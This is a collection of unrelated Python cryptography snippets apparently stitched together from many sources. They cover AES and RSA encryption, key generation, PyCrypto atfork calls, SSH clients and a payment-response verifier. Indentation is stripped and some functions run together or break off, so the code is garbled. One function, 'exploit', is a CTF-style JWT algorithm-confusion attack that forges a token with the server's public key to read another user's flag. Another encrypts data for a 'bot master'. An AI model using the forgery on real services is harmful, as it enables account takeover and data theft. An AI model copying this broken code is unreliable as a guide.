def encrypt_images(self, temp_dir, opened_files, sec_key):
file_list = []
iv_list = []
sim_key = Random.new().read(self.length_AES)
for f in opened_files:
with open(f, 'rb') as fhI:
file_name = ntpath.split(f)[1]
file_path = temp_dir + "/" + file_name
pic_data = fhI.read()
iv = Random.new().read(16)
iv_list.append(self.bin2b64(iv))
aes = AES.new(sim_key, AES.MODE_CFB, iv)
enc_pic_data = aes.encrypt(pic_data)
enc_pic_data_hex = self.bin2b64(enc_pic_data) # ovo ti i ne treba, zbog cuvanja mesta.. madaa? Izbacices, valja radit brze:D
with open(file_path, 'w') as fhO:
fhO.write(enc_pic_data_hex)
abs_file_path = os.path.abspath(file_path)
file_list.append(abs_file_path)
esk = sec_key.encrypt(sim_key, 'x')[0]
esk = self.bin2b64(esk)
return [file_list, esk, iv_list]
def new_key(self):
'''
Get a new AES key and iv, localbox uses a self generated iv
'''
key = Random.new().read(AES.key_size[2])
iv = Random.new().read(AES.block_size)
return LoxKey(key, iv)
def dencrypt(data, outpath, key = None): #print "Encrypting to %s" % outpath bs = AES.block_size if key is None: key = Random.new().read(16) else: key = base64.b64decode(key) iv = Random.new().read(bs) encryptor = AES.new(key, AES.MODE_CBC, iv) #print "Key: %s" % base64.b64encode(key) #print "IV: %s" % base64.b64encode(iv) fin = io.BytesIO(data) fout = io.BytesIO() fout.write(iv) while True: chunk = fin.read(bs*1024) if len(chunk) == 0: break elif len(chunk) % bs != 0: chunk += b' ' * (bs - len(chunk) % bs) fout.write(encryptor.encrypt(chunk)) with open(outpath, 'wb') as f: f.write(fout.getvalue()) return base64.b64encode(key)
def encrypt_hmac(key: bytes, plaintext: str) -> bytes:
""" encrypt(key, plaintext) -> Encrypts plaintext using key.
"""
# Generate a key from a salt and hashed key.
salt = Random.new().read(SALT_LEN)
valid_key = key_gen(key, salt)
iv = Random.new().read(IV_LEN)
padded_plaintext = PKCS7_pad(plaintext.encode(), AES.block_size)
encrypt_obj = AES.new(valid_key, AES.MODE_CBC, iv)
# Put the salt and iv at the start of the ciphertext so when it
# needs to be decrypted the same salt and iv can be used.
ciphertext = salt + iv + encrypt_obj.encrypt(padded_plaintext)
hmac_key = Random.new().read(32)
hmac = HMAC.new(hmac_key, digestmod=SHA512)
hmac.update(ciphertext)
hmac_digest = hmac.digest()
# Encrypt the hmac key
hmac_iv = Random.new().read(IV_LEN)
hmac_encrypt_obj = AES.new(valid_key, AES.MODE_CBC, hmac_iv)
encrypted_hmac_key = hmac_iv + hmac_encrypt_obj.encrypt(hmac_key)
# ciphertext = encrypted hmac key + hmac digest + salt + iv +
# encrypted data.
ciphertext = encrypted_hmac_key + hmac_digest + ciphertext
return ciphertext
def files_auth(request):
"""Display authentication for filecenter."""
if "password" in request.POST:
"""
Encrypt the password with AES mode CFB.
Create a random 32 char key, stored in a CLIENT-side cookie.
Create a random 32 char IV, stored in a SERVER-side session.
Store the encrypted ciphertext in a SERVER-side session.
This ensures that neither side can decrypt the password without
the information stored on the other end of the request.
Both the server-side session variables and the client-side cookies
are deleted when the user logs out.
"""
key = Random.new().read(32)
iv = Random.new().read(16)
obj = AES.new(key, AES.MODE_CFB, iv)
message = request.POST.get("password")
ciphertext = obj.encrypt(message)
request.session["files_iv"] = base64.b64encode(iv).decode()
request.session["files_text"] = base64.b64encode(ciphertext).decode()
cookie_key = base64.b64encode(key).decode()
nexturl = request.GET.get("next", None)
if nexturl and nexturl.startswith("/files"):
response = redirect(nexturl)
else:
response = redirect("files")
response.set_cookie(key="files_key", value=cookie_key)
return response
else:
return render(request, "files/auth.html", {})
def parse_response(self, form, success=True):
"""Parse and return payment response."""
fields = {
# Successful payment
'1101': ('SERVICE', 'VERSION', 'SND_ID', 'REC_ID', 'STAMP', # 1..5
'T_NO', 'AMOUNT', 'CURR', 'REC_ACC', 'REC_NAME', # 6..10
'SND_ACC', 'SND_NAME', 'REF', 'MSG', 'T_DATE'), # 11..15
# Unsuccessful payment
'1901': ('SERVICE', 'VERSION', 'SND_ID', 'REC_ID', 'STAMP', # 1..5
'REF', 'MSG') # 6..7
}
# See which response we got
resp = form.get('VK_SERVICE', None)
if not resp and resp not in fields:
raise InvalidResponseError
success = resp == '1101'
Random.atfork()
# Parse and validate MAC
m = self._build_mac(fields[resp], form)
f = lambda x: form.get('VK_%s' % x)
if not PKCS1_v1_5.new(self.keychain.public_key) \
.verify(SHA.new(m), b64decode(f('MAC'))):
raise InvalidResponseError
# Save payment data
data = {}
if success:
for item in ('T_NO', 'AMOUNT', 'CURR', 'REC_ACC', 'REC_NAME',
'SND_ACC', 'SND_NAME', 'REF', 'MSG', 'T_DATE'):
data[item] = f(item)
return PaymentResponse(self, data, success)
def create_client(self):
client = paramiko.SSHClient()
client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
# Re-initialize RNG after fork to avoid connectivity problems with Paramiko
Random.atfork()
client.connect(self.vm_address, username=self.vm_user, port=22, password=self.vm_user_password)
return client
def set_flag(ip, port, flag):
base_url = 'http://' + ip + ':' + port + '/'
username = (binascii.hexlify(Random.get_random_bytes(10))).decode()
password = (binascii.hexlify(Random.get_random_bytes(10))).decode()
account = create_account(base_url, username, password)
entry_request = {
'entry': flag,
'title': 'flag'
}
# login
jwt = login(base_url, username, password)
jwt_token = jwt['token']
# verify token
public_key = get_public_key(base_url)
verify_token(jwt_token, public_key, account)
entry = post_entry(base_url, jwt_token, entry_request)
# return entryid
return {
'FLAG_ID': entry['id'],
'TOKEN': jwt_token
}
def contextualize(self, context_command):
client = paramiko.SSHClient()
client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
# Re-initialize RNG after fork to avoid connectivity problems with Paramiko
Random.atfork()
client.connect(self.vm_address, username=self.vm_user, port=22, password=self.vm_user_password)
a,b,c = client.exec_command(context_command)
def GetElgamalParamqp(bits = 100):
while 1:
q = bignum(getPrime(bits-1, Random.new().read))
p = 2*q+1
if number.isPrime(p, randfunc=Random.new().read):
break
return q,p
def encrypt(self, msg, key):
""" Encrypt a message
:param msg: Message to encrypt
:param key: Key to protect the message
:return: The encrypted message
:rtype: bytes
"""
# Creating a key by hashing the password
key = hashlib.sha256(key.encode("utf-8")).digest()
# New seed for PyCrypto
Random.atfork()
# Generating initialization vector
iv = Random.new().read(AES.block_size)
crypto = AES.new(key, AES.MODE_CBC, iv)
plain = msg.encode("utf-8")
# Adding some data at the end to match the block size required by AES
padding_length = AES.block_size - len(plain) % AES.block_size
plain += bytes((padding_length,)) * padding_length
# Finally creating the crypted data
return iv + crypto.encrypt(plain)
def get_vipkey(self, vessel_name):
''' post to gapp, gapp should return a aes keysoup encrypted by vip's
pulbic key
'''
cmd = 'RVIP'
# a random request id for every request, verify it to prevent replay
req_id = Random.get_random_bytes(Tiger.REQID_SIZE)
obfus_key = Random.get_random_bytes(self.SID_SIZE)
obfus_key += self.xor_obfus(self.session_id, obfus_key)
msg = req_id + '{0:20}'.format(cmd + vessel_name)
# the final payload is obfuskey + obfused key + aes(dbreq)
payload = (obfus_key + self.encrypt_aes(msg,
aeskey=self.session_key,
hmackey=self.session_hmac_key))
# post to gapp
e_obj = open_request(self.fetch_srv, payload).read()
d_msg = self.decrypt_aes(e_obj, aeskey=self.session_key,
hmackey=self.session_hmac_key)
if req_id != d_msg[:Tiger.REQID_SIZE]:
print 'Request id mismatch, Possible Replay Attack!'
return None
shared_vipkey = d_msg[Tiger.REQID_SIZE:]
key_soup = self.rsa_priv.decrypt(shared_vipkey)
vip_session_key = key_soup[:Tiger.SKEY_SIZE]
vip_session_hmac_key = key_soup[Tiger.SKEY_SIZE:
Tiger.SKEY_SIZE + Tiger.HMACKEY_SIZE]
self.shared_vipkeys[vessel_name] = {'s_key': vip_session_key,
's_hmac_key': vip_session_hmac_key}
print 'new vessel-vip shared AES/HMAC keys fetched'
return 1
def encrypt(self, data):
if self.initialized == 0 and self.is_server == False:
taddr = self.proto.factory.tun.addr
taddr_hash = SHA384.new(taddr).digest()
iv = Random.new().read(AES.block_size)
salt = Random.new().read(SALT_LEN)
passwd = self.proto.factory.passwd
self.key = PBKDF2(passwd, salt, dkLen=AES_KEYLEN*2, count=PBKDF2_ITERATIONS)
self.aes_e = AES.new(self.key[:AES_KEYLEN], AES.MODE_CFB, iv)
self.aes_d = AES.new(self.key[AES_KEYLEN:], AES.MODE_CFB, iv)
data = iv+self.aes_e.encrypt(data)
tag = HMAC.new(self.key, msg=data, digestmod=SHA384).digest()[:SHA384_LEN]
data = taddr_hash+salt+data+tag
self.initialized = 1
else:
data = self.aes_e.encrypt(data)
tag = HMAC.new(self.key, msg=data, digestmod=SHA384).digest()[:SHA384_LEN]
data = data+tag
return data
def generate(self):
"""Generates a new RSA keypair and assignes to self."""
from Crypto import Random
Random.atfork()
key = RSA.generate(2048)
self.private = key.exportKey()
self.public = key.exportKey('OpenSSH')
def __init__(self, device=None, cfg=None):
self.newpt_count = 0
self.position = 0
self.speed_unit = 'Knots'
self.last_speed = 0
self.utc_time = ''
self.heading_degree = 0
# gapp and Tiger
self.fetch_srv = norm_address(cfg['hq']['url'] + cfg['hq']['path'])
self.login_srv = norm_address(cfg['hq']['url'] +
cfg['hq']['login_path'])
self.vessel_name = cfg['self']['name']
self.keysoup = None
#self.rsa_vippub = self.import_key(open(cfg['vip']['pub']))
# from ClientHello
self.key_soup = Random.get_random_bytes(Tiger.RSAOBJ_SIZE - 1)
self.session_id = Random.get_random_bytes(Tiger.SID_SIZE)
self.session_key = self.key_soup[:Tiger.SKEY_SIZE]
self.session_hmac_key = self.key_soup[
Tiger.SKEY_SIZE:Tiger.SKEY_SIZE + Tiger.HMACKEY_SIZE]
self.rsa_hqpub = self.import_key(open(cfg['hq']['pub']))
self.rsa_priv = self.import_key(open(cfg['self']['priv']))
self.shared_vipkeys = {}
self.login_okay = False
def _run(self):
# try to fix pycrypto
try:
from Crypto import Random
Random.atfork()
except:
pass
while True:
LOG.info('Start iteration')
try:
g = self.do_iteration()
if CONFIG['interval']:
timeout = self.iteration_timestamp + CONFIG['interval'] - time.time()
else:
timeout = 600
try:
g.get(timeout=timeout)
except gevent.Timeout:
raise IterationTimeoutError()
finally:
if not g.ready():
g.kill()
except KeyboardInterrupt:
raise KeyboardInterrupt
except:
LOG.error('Iteration failed, reason: %s' % helper.exc_info())
POOL.kill()
finally:
LOG.info('End iteration: %s' % (time.time() - self.iteration_timestamp))
if CONFIG['interval']:
sleep_time = self.iteration_timestamp + CONFIG['interval'] - time.time()
time.sleep(sleep_time)
else:
break
def encrypt_file(password_string, input_file, chunk_size):
# input_file is the unencrypted file.
# Create encryptor object.
salt = Random.new().read(SALT_LENGTH)
key = PBKDF2(password_string, salt, dkLen=KEY_LENGTH, count=ITERATIONS, prf=HMAC_SHA256)
ivec = Random.new().read(AES.block_size)
en = AES.new(key, AES.MODE_CBC, ivec)
# Takes in something like file.txt and outputs file.txt.cif.
with open(input_file, 'rb') as plain_file:
with open((input_file + '.cif'), 'wb') as cipher_file:
# Write the password salt to the output file.
cipher_file.write(salt)
# Write the initialization vector to the output file.
cipher_file.write(ivec)
# Write chunks. Look for the last one. Pad the last chunk!
current_chunk = plain_file.read(chunk_size)
while True:
next_chunk = plain_file.read(chunk_size)
if not next_chunk:
padded_chunk = get_padded_chunk(current_chunk)
cipher_file.write(en.encrypt(padded_chunk))
break
cipher_file.write(en.encrypt(current_chunk))
current_chunk = next_chunk
def encrypt_for_master(data, fn):
# Encrypt the file so it can only be read by the bot master
# Generate key and IV for AES encryption for data with 128 bits key size
aes_encryption_key = Random.get_random_bytes(16)
iv = Random.get_random_bytes(AES.block_size)
cipher = AES.new(aes_encryption_key, AES.MODE_CBC, iv)
# Padding is required since AES-CBC mode is chosen
padded_data = ANSI_X923_pad(bytes(str(data), 'ascii'), AES.block_size)
encrypted_data = cipher.encrypt(padded_data)
# Obtain public key from text file for encrypting aes encryption key and iv
pub_key = open("mypublickey.txt", "r").read()
rsa_encryption_key = RSA.importKey(pub_key)
key_data = aes_encryption_key + iv
encrypt_aes_key = rsa_encryption_key.encrypt(key_data, 16)
# Store the aes encryption key and iv
aes_key_file = os.path.join("pastebot.net", fn + ".AES.key")
out = open(aes_key_file, "wb")
out.write(encrypt_aes_key[0])
out.close()
print("Exported AES key!")
return encrypted_data
def mp_setup(ctx):
buckets = ctx.buckets # save buckets before setup resets them
s3setup(ctx)
if len(buckets):
for bucket in buckets:
s3bucket_named(ctx, bucket)
Random.atfork()
def enc_upload(filename, path):
global s, profile, ID
f = open(path,'r').read()
#salt = Random.new().read(AES.block_size)
salt = [ord(x) for x in Random.new().read(AES.block_size)]
#key_index = Random.new().read(AES.block_size)
key_index = [ord(x) for x in Random.new().read(AES.block_size)]
key_blocks = [ord(x) for x in Random.new().read(AES.block_size)]
block_index_iv=random_str(15)
#key_blocks = Random.new().read(AES.block_size)
profile[filename] = {'salt':salt, 'key_index':key_index, 'key_blocks':key_blocks, 'block_index_iv':block_index_iv}
hashed = hash_substrings(f, salt,block_index_iv, key_index)
h = open(filename+'hash', 'w')
h.write(json.dumps(hashed))
#h.write(hashed)
h.close()
url = "http://128.30.93.9:8080/zoobar/index.cgi/enc_upload"
files = {'file': (filename+'hash', open(filename+'hash','rb'))}
s.post(url, files=files)
encrypted_blocks = encrypt_blocks(f,key_blocks,block_index_iv,block_length)
b = open(filename+'block','w')
b.write(json.dumps(encrypted_blocks))
b.close()
url = "http://128.30.93.9:8080/zoobar/index.cgi/enc_upload"
files = {'file': (filename+'block', open(filename+'block','rb'))}
s.post(url, files=files)
upload_profile(ID)
def copy_from_old_parallel( args ):
Random.atfork()
odte, ndte, i, S = args
ret = []
pw = odte.decode_pw(S)
if not pw: return (i,[])
return (i,ndte.encode_pw(pw))
def exploit(ip, port, flag_id):
base_url = 'http://' + ip + ':' + port + '/'
username = (binascii.hexlify(Random.get_random_bytes(10))).decode()
password = (binascii.hexlify(Random.get_random_bytes(10))).decode()
account = create_account(base_url, username, password)
jwt = login(base_url, username, password)
jwt_token = jwt['token']
entries = get_all_entries(base_url, jwt_token)
for entry in entries:
if entry['id'] == flag_id:
target_entry = entry
(header, body, signature) = jwt_token.split('.')
header_decoded = json.loads(base64.b64decode(header).decode())
header_decoded['alg'] = 'HS256'
header_payload = base64.b64encode(json.dumps(header_decoded).encode())
body_decoded = json.loads(base64.b64decode(body).decode())
body_decoded['username'] = target_entry['owner']
body_payload = base64.b64encode(json.dumps(body_decoded).encode())
to_sign = header_payload + b'.' + body_payload
public_key = get_public_key(base_url)
hmac = HMAC.new(public_key.encode(), to_sign, SHA256)
payload_signature = base64.b64encode(hmac.digest())
payload_jwt = to_sign + b'.' + payload_signature
exploit_entry = get_entry(base_url, payload_jwt.decode(), flag_id)
return {'FLAG': exploit_entry['entry']}
def edit_command(initialize=False):
"""
edit_command takes one argument: initialize (defaulting to False); if not set
to initialize, it decrypts the password file to a temporary file for editing;
in either case, it encrypts the tempfile to be the new password file after
the user has finished writing.
"""
file_descriptor, filename = tempfile.mkstemp()
if not initialize:
with os.fdopen(file_descriptor, 'wb') as temp_handle:
temp_handle.write(decryptf(PASSWORD_FILE))
editor_process = subprocess.Popen([os.environ['EDITOR'], filename])
editor_process.wait()
salt = Random.new().read(8)
iv = Random.new().read(16)
key = PBKDF2(getpass.getpass('Password (for encryption): '), salt).read(32)
if PBKDF2(getpass.getpass('Repeat password: '******'Encryption passwords do not match.')
cipher = AES.new(key, AES.MODE_CBC, iv)
with open(filename, 'rb') as temp_handle:
ciphertext = ''.join([salt, iv,
cipher.encrypt(pad(temp_handle.read(), 16))])
with open(PASSWORD_FILE, 'wb') as password_handle:
password_handle.write(ciphertext)
shred_proc = subprocess.Popen(['shred', '-u', filename])
shred_proc.wait()
def encrypt(self, plaintext): self.salt = Random.new().read(self.block_size) iv = Random.new().read(self.block_size) # 1 iteration here because we're not really doing this for CPU intensity cipher = AES.new(pbkdf2(self.key, self.salt, iterations=1, keylen=self.key_size), AES.MODE_CBC, iv) ciphertext = cipher.encrypt(self.pad(plaintext)) return quote(urlsafe_b64encode(self.salt + iv + ciphertext))
def generate_key_pair(request):
"""
Response to generate private/public RSA key pair
"""
get_user(request, settings.ASTAKOS_AUTH_URL)
if request.method != "POST":
return http.HttpResponseNotAllowed(["POST"])
if not SUPPORT_GENERATE_KEYS:
raise Exception("Application does not support ssh keys generation")
if PublicKeyPair.user_limit_exceeded(request.user_uniq):
return http.HttpResponseServerError("SSH keys limit exceeded")
# generate RSA key
from Crypto import Random
Random.atfork()
key = rsakey.RSA.generate(SSH_KEY_LENGTH)
# get PEM string
pem = exportKey(key, 'PEM')
public_data = Message()
public_data.add_string('ssh-rsa')
public_data.add_mpint(key.key.e)
public_data.add_mpint(key.key.n)
# generate public content
public = str("ssh-rsa %s" % base64.b64encode(str(public_data)))
data = {'private': pem, 'public': public}
return http.HttpResponse(json.dumps(data), mimetype="application/json")
def run(self):
key_ts = struct.pack('!Q', int(time.time() * 1000))
key = Random.new().read(32)
kds_count = -1
while (True):
# KDS
kds_count = kds_count + 1
if kds_count % 120 == 0:
key_ts = struct.pack("!Q", int(time.time() * 1000))
key = Random.new().read(32)
kds_thread = kds.SimpleKDSPublisher(Name(bld_root), self.keychain, self.cert_name, key, key_ts)
kds_thread.start()
kds_count = 0
# Data
now = int(time.time() * 1000) # in milliseconds
a = self.master.execute(100, cst.READ_HOLDING_REGISTERS, 166, 1)
b = self.master.execute(100, cst.READ_HOLDING_REGISTERS, 167, 1)
vln = (b[0] << 16) + a[0]
c = self.master.execute(1, cst.READ_HOLDING_REGISTERS, 150, 1)
la = c[0]
payload = {'ts': now, 'vlna': vln, 'la': la}
timestamp = struct.pack("!Q", now) # timestamp is in milliseconds
self.publishData(key, key_ts, payload, timestamp)
time.sleep(self.interval)
def inner(*args, **kwargs):
# Required for ssh/PyCrypto to be happy in multiprocessing
# (as far as we can tell, this is needed even with the extra such
# calls in newer versions of paramiko.)
if Random:
Random.atfork()
return func(*args, **kwargs)
def create_entry(self, group = None, title = "", image = 1, url = "",
username = "", password = "", comment = "",
y = 2999, mon = 12, d = 28, h = 23, min_ = 59,
s = 59):
"""This method creates a new entry.
The group which should hold the entry is needed.
image must be an unsigned int >0, group a v1Group.
It is possible to give an expire date in the following way:
- y is the year between 1 and 9999 inclusive
- mon is the month between 1 and 12
- d is a day in the given month
- h is a hour between 0 and 23
- min_ is a minute between 0 and 59
- s is a second between 0 and 59
The special date 2999-12-28 23:59:59 means that entry expires never.
"""
if (type(title) is not str or
type(image) is not int or image < 0 or
type(url) is not str or
type(username) is not str or
type(password) is not str or
type(comment) is not str or
type(y) is not int or
type(mon) is not int or
type(d) is not int or
type(h) is not int or
type(min_) is not int
or type(s) is not int or
type(group) is not v1Group):
raise KPError("One argument has not a valid type.")
elif group not in self.groups:
raise KPError("Group doesn't exist.")
elif (y > 9999 or y < 1 or mon > 12 or mon < 1 or d > 31 or d < 1 or
h > 23 or h < 0 or min_ > 59 or min_ < 0 or s > 59 or s < 0):
raise KPError("No legal date")
elif (((mon == 1 or mon == 3 or mon == 5 or mon == 7 or mon == 8 or
mon == 10 or mon == 12) and d > 31) or
((mon == 4 or mon == 6 or mon == 9 or mon == 11) and d > 30) or
(mon == 2 and d > 28)):
raise KPError("Given day doesn't exist in given month")
Random.atfork()
uuid = Random.get_random_bytes(16)
entry = v1Entry(group.id_, group, image, title, url, username,
password, comment,
datetime.now().replace(microsecond = 0),
datetime.now().replace(microsecond = 0),
datetime.now().replace(microsecond = 0),
datetime(y, mon, d, h, min_, s),
uuid)
self.entries.append(entry)
group.entries.append(entry)
self._num_entries += 1
return True
def encodeUniqueId(session):
info = {'machine': collect_machine_info(),
'session': session}
#prefix the JSON string with Magic byte '2' to indicate the new uid data format for the server
json_string = '2' + json.dumps(info)
public_key = rsa.PublicKey(13731707816857396218511477189051880183926672022487649441793167544537, 65537 )
iv = Random.get_random_bytes(16)
ivb64 = base64.b64encode(iv)
assert (len(ivb64) == 24)
aeskey = Random.get_random_bytes(16)
aeskeyencrypted = rsa.encrypt(aeskey, public_key)
aeskeyencryptedb64 = base64.b64encode(aeskeyencrypted)
assert (len(aeskeyencryptedb64) == 40)
aes = AES.new(aeskey, AES.MODE_CBC, iv)
# insert trailing bytes to make len(json_string) a multiple of 16
json_string_len = len(json_string)
trailing = (((json_string_len // 16) + 1) * 16) - json_string_len
json_string = json_string + "x" * trailing
trailingbyte = chr(trailing).encode('utf-8')
encrypted = aes.encrypt(json_string)
encryptedb64 = base64.b64encode(encrypted)
msg = trailingbyte + ivb64 + encryptedb64 + aeskeyencryptedb64
msg = msg.decode('latin-1').encode('utf-8')
return base64.b64encode(msg)
def encryption_oracle(input):
rand_num1 = randint(5, 10)
rand_num2 = randint(5, 10)
encrypt_ecb = randint(0, 1)
before = pkcs7_pad("", rand_num1)
after = pkcs7_pad("", rand_num2)
ciphertext = ""
iv = ""
key = Random.get_random_bytes(16)
modified_input = before + input + after
padded_input = pkcs7_pad(modified_input, 16)
if encrypt_ecb == 1:
# encrypt ECB
encryptor = AES.new(key, AES.MODE_ECB)
ciphertext = encryptor.encrypt(padded_input)
print "ECB here"
else:
# encrypt CBC
iv = Random.get_random_bytes(16)
encryptor = AES.new(key, AES.MODE_CBC, iv)
ciphertext = encryptor.encrypt(padded_input)
print "CBC here"
return key, iv, ciphertext
def encrypt(msg):
key = get_secret('encrypt_key').decode('hex')
iv = Random.new().read(AES.block_size)
cipher = AES.new(key, AES.MODE_CFB, iv)
return (iv + cipher.encrypt(_strify(msg))).encode('base-64').strip()
def gen_nonce(cls):
return struct.unpack('Q', Random.new().read(8))[0]
from Crypto.Cipher import AES
from Crypto import Random
import time
#Random Key Generator
key = Random.new().read(AES.block_size)
#AES Encryption
start = time.clock()
for i in range(0, 1000):
cipher = AES.new(key, AES.MODE_ECB)
message = cipher.encrypt(b'1234567891234567')
stop = time.clock()
print("Cipher text is")
print(message)
print("Time taken")
print(stop - start)
#Testing the using decrypt function
message1 = cipher.decrypt(message)
print("Plain text after Decryption is")
print(message1)
if (len(sys.argv) < 4):
print "Use:", sys.argv[0], "SERVER PORT NICKNAME"
quit()
sizekey = 128
try:
arq = open(path + "clientKey/key.pem", "r")
key = arq.read()
key = RSA.importKey(key)
publickey = key.publickey()
publicascii = str(publickey.exportKey())
arq.close()
except:
print "If you want to use your own key, save the private key as \"key.pem\" in the directory called \"clientKey\".\nThe default size is 1024 bits."
print "You can generate your own key using the program \"openssl\". When you have it installed in your machine, run \"openssl genrsa -out key.pem 1024\" and put the file in the correct directory."
random_generator = Random.new().read
key = RSA.generate(sizekey * 8, random_generator)
publickey = key.publickey()
publicascii = str(publickey.exportKey())
#the key has a limit of 128 bytes, so to solve that problem, the big messages need
#to be splited, encrypted singly and reconnected with this spacer in the middle
spacer = "@@@"
def decrypt(msg):
newmsg = msg.split(spacer)
decrypted = ""
i = 0
while (i < len(newmsg)):
decrypted = decrypted + str(
key.decrypt(ast.literal_eval(str(newmsg[i]))))
def rsa_decrypt(input_string, private_key):
input_bytes = base64.b64decode(input_string)
rsa_key = RSA.importKey("-----BEGIN RSA PRIVATE KEY-----\n" + private_key + "\n-----END RSA PRIVATE KEY-----")
cipher = PKCS1_v1_5.new(rsa_key)
# noinspection PyArgumentList
return str(cipher.decrypt(input_bytes, Random.new().read), 'utf-8')
def encrypt(raw):
raw = pad(raw)
iv = Random.new().read(AES.block_size)
cipher = AES.new(key, AES.MODE_CBC, iv)
return base64.b64encode(iv + cipher.encrypt(raw.encode('utf8')))
def encrypt(key, input, out_filename='privateKey.enc'):
iv = Random.new().read(AES.block_size)
encryptor = AES.new(key, AES.MODE_CBC, iv)
with open(out_filename, 'wb') as outfile:
outfile.write(iv)
outfile.write(encryptor.encrypt(input))
def encrypt(self, message, key, key_size=256):
message = self.pad(message)
iv = Random.new().read(AES.block_size)
cipher = AES.new(key, AES.MODE_CBC, iv)
return iv + cipher.encrypt(message)
def test_generate_2arg(self):
"""DSA (default implementation) generated key (2 arguments)"""
dsaObj = self.dsa.generate(1024, Random.new().read)
self._check_private_key(dsaObj)
pub = dsaObj.publickey()
self._check_public_key(pub)
def encrypt(self, raw):
raw = self._pad(raw)
iv = Random.new().read(AES.block_size)
cipher = AES.new(self.key, AES.MODE_CBC, iv)
return base64.b64encode(iv + cipher.encrypt(raw))
